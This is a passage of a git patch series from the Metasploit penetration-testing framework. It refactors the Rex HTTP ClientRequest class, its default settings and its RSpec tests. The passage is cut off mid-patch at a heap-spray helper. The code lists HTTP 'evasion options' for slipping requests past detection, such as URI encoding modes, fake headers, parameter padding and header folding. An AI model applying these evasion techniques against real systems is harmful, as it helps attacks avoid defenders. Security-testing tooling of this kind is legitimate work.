:pending => excuse_lazy(:set_formatted_header) do - - end - it "should respond to its various accessors" do @cli.should respond_to :config @cli.should respond_to :config_types From 5e0161d3f748e058233799567f6c3b7351ee6539 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:31:24 -0600 Subject: [PATCH 092/139] Reflect new ClientRequst in docs --- lib/rex/proto/http/client.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 928cbf4b4b..8bb69f2735 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -167,7 +167,7 @@ class Client # @option opts 'version' [String] version of the protocol, default: 1.1 # @option opts 'vhost' [String] Host header value # - # @return [Request] + # @return [ClientRequest] def request_raw(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -206,7 +206,7 @@ class Client # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data # - # @return [Request] + # @return [ClientRequest] def request_cgi(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -322,7 +322,7 @@ class Client # # Send an HTTP request to the server # - # @param req [Request,#to_s] The request to send + # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # def send_request(req, t = -1) @@ -333,6 +333,7 @@ class Client # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object + # # @param res [Response] the HTTP Response object # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds From 764bbbb8e5a8068a2bd100199b40e36f3895d0d5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:19 -0600 Subject: [PATCH 093/139] Whitespace --- lib/rex/proto/http/client_request.rb | 42 ++++++++++++++-------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 26592be1ca..2722483200 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,28 +36,28 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] - @config = opts['client_config'] || {} - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] - @encode = opts['encode'] + @cgi = opts['cgi'] + @config = opts['client_config'] || {} + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] - @host = opts['vhost'] - @method = opts['method'] - @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] - @version = opts['version'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] @opts = opts end From d463460da7ff12e3bc5a62cd71662bb21c26721c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:54 -0600 Subject: [PATCH 094/139] Default cgi to true when not given --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2722483200..69c24d7a95 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,7 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] + @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] From c206ac4998f1b066f366d26159afff1d1aa21c07 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:15:51 -0600 Subject: [PATCH 095/139] Set some reasonable defaults Fixes a number of nil deref issues --- lib/rex/proto/http/client_request.rb | 20 ++++++++++--------- .../lib/rex/proto/http/client_request_spec.rb | 4 ++-- 2 files changed, 13 insertions(+), 11 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 69c24d7a95..c73144c2bb 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,29 +36,31 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] - @data = opts['data'] + @data = opts['data'] || "" @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] + @headers = opts['headers'] || {} @host = opts['vhost'] - @method = opts['method'] + @method = opts['method'] || "GET" @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] + @port = opts['port'] || 80 + @protocol = opts['proto'] || "HTTP" + @query = opts['query'] || "" + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] @opts = opts + + config['chunked_size'] ||= 0 + config['pad_method_uri_count'] ||= 1 end def to_s diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index c5ac25a5ca..1dba9ca48d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -176,8 +176,8 @@ describe Rex::Proto::Http::ClientRequest do } it "should contain the params" do - client_request.to_s.should contain("foo[]=bar") - client_request.to_s.should contain("foo[]=baz") + client_request.to_s.should include("foo[]=bar") + client_request.to_s.should include("foo[]=baz") end end From d7de3b75a43975ae2cb898bb8cf1b71737811924 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:18:20 -0600 Subject: [PATCH 096/139] Format Authorization header like others Also sorts the set_*_header methods --- lib/rex/proto/http/client_request.rb | 61 +++++++++++++--------------- 1 file changed, 29 insertions(+), 32 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c73144c2bb..efc6e2b95c 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -142,10 +142,7 @@ class ClientRequest req << set_agent_header end - if authorization - req << set_auth_header - end - + req << set_auth_header req << set_cookie_header req << set_connection_header req << set_extra_headers @@ -159,10 +156,6 @@ class ClientRequest protected - def set_auth_header - "Authorization: " + authorization - end - def set_uri uri_str = uri.dup if (config['uri_dir_self_reference']) @@ -347,23 +340,14 @@ class ClientRequest end # - # Return the HTTP Host header + # Return a formatted header string # - def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" end - - # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) end # @@ -373,15 +357,8 @@ class ClientRequest user_agent ? set_formatted_header("User-Agent", user_agent) : "" end - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end + def set_auth_header + authorization ? set_formatted_header("Authorization", authorization) : "" end # @@ -412,6 +389,26 @@ class ClientRequest set_formatted_header("Content-Length", clen) end + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + # # Return a string of formatted extra headers # From 579c11bc690573c15f01413b875f212461419fcf Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:25:39 -0600 Subject: [PATCH 097/139] Set reasonable defaults for more things All current tests are passing now --- lib/rex/proto/http/client_request.rb | 5 +++-- spec/lib/rex/proto/http/client_request_spec.rb | 2 -- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index efc6e2b95c..3f6ac6b760 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,6 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) + @cgi = (opts['cgi'].nil? ? true : opts['cgi']) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @@ -54,8 +55,8 @@ class ClientRequest @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] + @vars_get = opts['vars_get'] || {} + @vars_post = opts['vars_post'] || {} @version = opts['version'] @opts = opts diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 1dba9ca48d..14d28e8001 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -169,7 +169,6 @@ describe Rex::Proto::Http::ClientRequest do 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) @@ -177,7 +176,6 @@ describe Rex::Proto::Http::ClientRequest do it "should contain the params" do client_request.to_s.should include("foo[]=bar") - client_request.to_s.should include("foo[]=baz") end end From 93537de68ca76601175512d6589115ae96b7e387 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:27:32 -0600 Subject: [PATCH 098/139] Use let and subject blocks for better readability --- spec/lib/rex/proto/http/client_spec.rb | 79 +++++++++++++------------- 1 file changed, 39 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 0105b11136..d0e222df84 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -28,33 +28,32 @@ describe Rex::Proto::Http::Client do end - before(:all) do - @ip = "1.2.3.4" - @cli = Rex::Proto::Http::Client.new(@ip) + let(:ip) { "1.2.3.4" } + subject(:cli) do + Rex::Proto::Http::Client.new(ip) end it "should respond to intialize" do - @cli.should be + cli.should be end it "should have a set of default instance variables" do - @cli.instance_variable_get(:@hostname).should == @ip - @cli.instance_variable_get(:@port).should == 80 - @cli.instance_variable_get(:@context).should == {} - @cli.instance_variable_get(:@ssl).should be_false - @cli.instance_variable_get(:@proxies).should be_nil - # @cli.instance_variable_get(:@username).should be_empty - # @cli.instance_variable_get(:@password).should be_empty - @cli.config.should be_a_kind_of Hash - @cli.config_types.should be_a_kind_of Hash + cli.instance_variable_get(:@hostname).should == ip + cli.instance_variable_get(:@port).should == 80 + cli.instance_variable_get(:@context).should == {} + cli.instance_variable_get(:@ssl).should be_false + cli.instance_variable_get(:@proxies).should be_nil + # cli.instance_variable_get(:@username).should be_empty + # cli.instance_variable_get(:@password).should be_empty + cli.config.should be_a_kind_of Hash end it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should attempt to connect to a server" do @@ -63,7 +62,7 @@ describe Rex::Proto::Http::Client do end it "should be able to close a connection" do - @cli.close.should be_nil + cli.close.should be_nil end it "should send a request and receive a response", :pending => excuse_needs_connection do @@ -79,7 +78,7 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # @cli.should_not have_creds + # cli.should_not have_creds # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) # this_cli.should have_creds pending "Should actually respond to :has_creds" @@ -91,7 +90,7 @@ describe Rex::Proto::Http::Client do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip - @cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end it "should perform digest authentication", :pending => excuse_needs_auth do @@ -107,45 +106,45 @@ describe Rex::Proto::Http::Client do end it "should end a connection with a stop" do - @cli.stop.should be_nil + cli.stop.should be_nil end it "should test if a connection is valid" do - @cli.conn?.should be_false + cli.conn?.should be_false end it "should tell if pipelining is enabled" do - @cli.pipelining?.should be_false + cli.pipelining?.should be_false this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true this_cli.pipelining?.should be_true end it "should respond to its various accessors" do - @cli.should respond_to :config - @cli.should respond_to :config_types - @cli.should respond_to :pipeline - @cli.should respond_to :local_host - @cli.should respond_to :local_port - @cli.should respond_to :conn - @cli.should respond_to :context - @cli.should respond_to :proxies - # @cli.should respond_to :username - # @cli.should respond_to :password - @cli.should respond_to :junk_pipeline + cli.should respond_to :config + cli.should respond_to :config_types + cli.should respond_to :pipeline + cli.should respond_to :local_host + cli.should respond_to :local_port + cli.should respond_to :conn + cli.should respond_to :context + cli.should respond_to :proxies + # cli.should respond_to :username + # cli.should respond_to :password + cli.should respond_to :junk_pipeline # These are supposed to be protected - @cli.should respond_to :ssl - @cli.should respond_to :ssl_version - @cli.should respond_to :hostname - @cli.should respond_to :port + cli.should respond_to :ssl + cli.should respond_to :ssl_version + cli.should respond_to :hostname + cli.should respond_to :port end # Not super sure why these are protected... it "should refuse access to its protected accessors" do - expect {@cli.ssl}.to raise_error NoMethodError - expect {@cli.ssl_version}.to raise_error NoMethodError - expect {@cli.hostname}.to raise_error NoMethodError - expect {@cli.port}.to raise_error NoMethodError + expect {cli.ssl}.to raise_error NoMethodError + expect {cli.ssl_version}.to raise_error NoMethodError + expect {cli.hostname}.to raise_error NoMethodError + expect {cli.port}.to raise_error NoMethodError end end From 935304ee0c31477a0e5ae9f890f168636fb91b95 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:36:36 -0600 Subject: [PATCH 099/139] No longer pending --- spec/lib/rex/proto/http/client_spec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d0e222df84..d216c75325 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -48,11 +48,11 @@ describe Rex::Proto::Http::Client do cli.config.should be_a_kind_of Hash end - it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a raw HTTP request" do cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end - it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a CGI HTTP request" do cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end From 29df20996e537076e9f6ee33fb92fdd2b908a069 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 17:38:03 -0600 Subject: [PATCH 100/139] Move most of the configuration into ClientRequest Also fixes in-place modification of the query string which resulted in duplication of the GET parameters when calling #to_s more than once. --- lib/rex/proto/http/client.rb | 79 ++--------------- lib/rex/proto/http/client_request.rb | 88 ++++++++++++++----- lib/rex/text.rb | 4 +- .../lib/rex/proto/http/client_request_spec.rb | 72 ++++++++++++--- 4 files changed, 132 insertions(+), 111 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 8bb69f2735..2912065309 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'rex/proto/http/client_request' + module Rex module Proto module Http @@ -21,7 +23,7 @@ module Http ### class Client - DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance @@ -35,85 +37,14 @@ class Client self.proxies = proxies self.username = username self.password = password + self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, 'version' => '1.1', 'agent' => DefaultUserAgent, - # - # Evasion options - # - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all - 'uri_encode_count' => 1, # integer - 'uri_full_url' => false, # bool - 'pad_method_uri_count' => 1, # integer - 'pad_uri_version_count' => 1, # integer - 'pad_method_uri_type' => 'space', # space, tab, apache - 'pad_uri_version_type' => 'space', # space, tab, apache - 'method_random_valid' => false, # bool - 'method_random_invalid' => false, # bool - 'method_random_case' => false, # bool - 'version_random_valid' => false, # bool - 'version_random_invalid' => false, # bool - 'version_random_case' => false, # bool - 'uri_dir_self_reference' => false, # bool - 'uri_dir_fake_relative' => false, # bool - 'uri_use_backslashes' => false, # bool - 'pad_fake_headers' => false, # bool - 'pad_fake_headers_count' => 16, # integer - 'pad_get_params' => false, # bool - 'pad_get_params_count' => 8, # integer - 'pad_post_params' => false, # bool - 'pad_post_params_count' => 8, # integer - 'uri_fake_end' => false, # bool - 'uri_fake_params_start' => false, # bool - 'header_folding' => false, # bool - 'chunked_size' => 0, # integer - # - # NTLM Options - # - 'usentlm2_session' => true, - 'use_ntlmv2' => true, - 'send_lm' => true, - 'send_ntlm' => true, - 'SendSPN' => true, - 'UseLMKey' => false, - 'domain' => 'WORKSTATION', - # - # Digest Options - # - 'DigestAuthIIS' => true - } + }.merge(Http::ClientRequest::DefaultConfig) - # This is not used right now... - self.config_types = { - 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], - 'uri_encode_count' => 'integer', - 'uri_full_url' => 'bool', - 'pad_method_uri_count' => 'integer', - 'pad_uri_version_count' => 'integer', - 'pad_method_uri_type' => ['space', 'tab', 'apache'], - 'pad_uri_version_type' => ['space', 'tab', 'apache'], - 'method_random_valid' => 'bool', - 'method_random_invalid' => 'bool', - 'method_random_case' => 'bool', - 'version_random_valid' => 'bool', - 'version_random_invalid' => 'bool', - 'version_random_case' => 'bool', - 'uri_dir_self_reference' => 'bool', - 'uri_dir_fake_relative' => 'bool', - 'uri_use_backslashes' => 'bool', - 'pad_fake_headers' => 'bool', - 'pad_fake_headers_count' => 'integer', - 'pad_get_params' => 'bool', - 'pad_get_params_count' => 'integer', - 'pad_post_params' => 'bool', - 'pad_post_params_count' => 'integer', - 'uri_fake_end' => 'bool', - 'uri_fake_params_start' => 'bool', - 'header_folding' => 'bool', - 'chunked_size' => 'integer' - } end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 3f6ac6b760..68c3aa5f48 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -1,7 +1,10 @@ # -*- coding: binary -*- require 'uri' -require 'rex/proto/http' +#require 'rex/proto/http' +require 'rex/socket' +require 'rex/text' +require 'pp' module Rex module Proto @@ -9,6 +12,55 @@ module Http class ClientRequest + DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultConfig = { + # + # Evasion options + # + 'encode_params' => true, + 'encode' => true, + 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all + 'uri_encode_count' => 1, # integer + 'uri_full_url' => false, # bool + 'pad_method_uri_count' => 1, # integer + 'pad_uri_version_count' => 1, # integer + 'pad_method_uri_type' => 'space', # space, tab, apache + 'pad_uri_version_type' => 'space', # space, tab, apache + 'method_random_valid' => false, # bool + 'method_random_invalid' => false, # bool + 'method_random_case' => false, # bool + 'version_random_valid' => false, # bool + 'version_random_invalid' => false, # bool + 'version_random_case' => false, # bool + 'uri_dir_self_reference' => false, # bool + 'uri_dir_fake_relative' => false, # bool + 'uri_use_backslashes' => false, # bool + 'pad_fake_headers' => false, # bool + 'pad_fake_headers_count' => 16, # integer + 'pad_get_params' => false, # bool + 'pad_get_params_count' => 8, # integer + 'pad_post_params' => false, # bool + 'pad_post_params_count' => 8, # integer + 'uri_fake_end' => false, # bool + 'uri_fake_params_start' => false, # bool + 'header_folding' => false, # bool + 'chunked_size' => 0, # integer + # + # NTLM Options + # + 'usentlm2_session' => true, + 'use_ntlmv2' => true, + 'send_lm' => true, + 'send_ntlm' => true, + 'SendSPN' => true, + 'UseLMKey' => false, + 'domain' => 'WORKSTATION', + # + # Digest Options + # + 'DigestAuthIIS' => true + } + attr_accessor :authorization attr_accessor :cgi attr_accessor :config @@ -16,8 +68,6 @@ class ClientRequest attr_accessor :content_type attr_accessor :cookie attr_accessor :data - attr_accessor :encode - attr_accessor :encode_params attr_accessor :headers attr_accessor :host attr_accessor :method @@ -37,13 +87,11 @@ class ClientRequest def initialize(opts={}) @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = opts['client_config'] || {} + @config = DefaultConfig.merge(opts['client_config'] || {}) @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @data = opts['data'] || "" - @encode = opts['encode'] - @encode_params = opts['encode_params'] @headers = opts['headers'] || {} @host = opts['vhost'] @method = opts['method'] || "GET" @@ -51,28 +99,26 @@ class ClientRequest @port = opts['port'] || 80 @protocol = opts['proto'] || "HTTP" @query = opts['query'] || "" - @ssl = opts['ssl'] || false + @ssl = opts['ssl'] @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] || {} @vars_post = opts['vars_post'] || {} - @version = opts['version'] + @version = opts['version'] || "1.1" @opts = opts - config['chunked_size'] ||= 0 - config['pad_method_uri_count'] ||= 1 end def to_s - # Start GET query string - qstr = query + # Start GET query string + qstr = query.dup # Start POST data string pstr = data - if cgi == true + if cgi uri_str= set_cgi if (config['pad_get_params']) @@ -86,9 +132,9 @@ class ClientRequest vars_get.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (encode_params ? set_encode_uri(var) : var) + qstr << (config['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (encode_params ? set_encode_uri(val) : val) + qstr << (config['encode_params'] ? set_encode_uri(val) : val) end if (config['pad_post_params']) @@ -96,21 +142,21 @@ class ClientRequest rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end vars_post.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(var) : var) + pstr << (config['encode_params'] ? set_encode_uri(var) : var) pstr << '=' - pstr << (encode_params ? set_encode_uri(val) : val) + pstr << (config['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if encode + if config['encode'] qstr = set_encode_uri(qstr) end end @@ -120,7 +166,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if encode + if config['encode'] req << set_encode_uri(uri_str) else req << uri_str diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 9db91c0d8e..e9a46035ff 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -158,7 +158,7 @@ module Text # Converts ISO-8859-1 to UTF-8 # def self.to_utf8(str) - + if str.respond_to?(:encode) # Skip over any bytes that fail to convert to UTF-8 return str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' }) @@ -550,7 +550,7 @@ module Text when 'u-half' return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms-half'), '%u', 2) } else - raise TypeError, 'invalid mode' + raise TypeError, "invalid mode #{mode.inspect}" end end diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 14d28e8001..154a1a9485 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -7,10 +7,8 @@ shared_context "with 'uri_dir_self_reference'" do client_request.config['uri_dir_self_reference'] = true end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" end end @@ -21,10 +19,8 @@ shared_context "with no evasions" do client_request.config['uri_full_url'] = false end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" end end @@ -166,17 +162,65 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'cgi' => true, - 'vars_get' => { - 'foo[]' => 'bar', - } + 'client_config' => { + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, + }, + 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + # default + let(:encode_mode) { 'hex-normal' } - it "should contain the params" do - client_request.to_s.should include("foo[]=bar") + let(:vars_get) do + { + 'foo[]' => 'bar', + 'bar' => 'baz', + 'frobnicate' => 'the froozle?', + } end + + context "without 'encode_params'" do + let(:encode_params) { false } + it "should contain the unaltered params" do + str = client_request.to_s + str.should include("foo[]=bar") + str.should include("bar=baz") + str.should include("frobnicate=the froozle?") + end + end + + context "with 'encode_params'" do + let(:encode_params) { true } + context "with 'uri_encode_mode' = default (hex-normal)" do + it "should encode special chars" do + str = client_request.to_s + str.should include("foo%5b%5d=bar") + str.should include("bar=baz") + str.should include("frobnicate=the%20froozle%3f") + end + end + + context "with 'uri_encode_mode' = hex-all" do + let(:encode_mode) { 'hex-all' } + it "should encode all chars" do + str = client_request.to_s + str.should include("%66%6f%6f%5b%5d=%62%61%72") + str.should include("%62%61%72=%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + end + end + + describe "#to_s" do + it "should produce same values if called multiple times with same options" do + client_request.to_s.should == client_request.to_s + end + end + + end + end describe "#set_uri" do From 7a7dd8975f4125dda67d7499cc12f47f71691e10 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 18:16:44 -0600 Subject: [PATCH 101/139] Hmm, turns out something actually used that Despite comments to the contrary --- lib/rex/proto/http/client.rb | 30 ++++++++++++++++++++++++++++ lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 31 insertions(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 2912065309..f3073ca530 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -45,6 +45,36 @@ class Client 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) + self.config_types = { + 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], + 'uri_encode_count' => 'integer', + 'uri_full_url' => 'bool', + 'pad_method_uri_count' => 'integer', + 'pad_uri_version_count' => 'integer', + 'pad_method_uri_type' => ['space', 'tab', 'apache'], + 'pad_uri_version_type' => ['space', 'tab', 'apache'], + 'method_random_valid' => 'bool', + 'method_random_invalid' => 'bool', + 'method_random_case' => 'bool', + 'version_random_valid' => 'bool', + 'version_random_invalid' => 'bool', + 'version_random_case' => 'bool', + 'uri_dir_self_reference' => 'bool', + 'uri_dir_fake_relative' => 'bool', + 'uri_use_backslashes' => 'bool', + 'pad_fake_headers' => 'bool', + 'pad_fake_headers_count' => 'integer', + 'pad_get_params' => 'bool', + 'pad_get_params_count' => 'integer', + 'pad_post_params' => 'bool', + 'pad_post_params_count' => 'integer', + 'uri_fake_end' => 'bool', + 'uri_fake_params_start' => 'bool', + 'header_folding' => 'bool', + 'chunked_size' => 'integer' + } + + end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 68c3aa5f48..1b55784e99 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -116,7 +116,7 @@ class ClientRequest qstr = query.dup # Start POST data string - pstr = data + pstr = data.dup if cgi uri_str= set_cgi From e3f075730416bd8d27a1d93cda957af6d9824fac Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 27 Feb 2013 14:08:57 -0600 Subject: [PATCH 102/139] Improved version thanks to corelanc0d3r --- lib/msf/core/exploit/http/server.rb | 27 +++++++++++++++++++-------- 1 file changed, 19 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 5fdfaf77ff..0ec0b0beb2 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -798,17 +798,27 @@ protected # publication on "DEPS – Precise Heap Spray on Firefox and IE10" # def 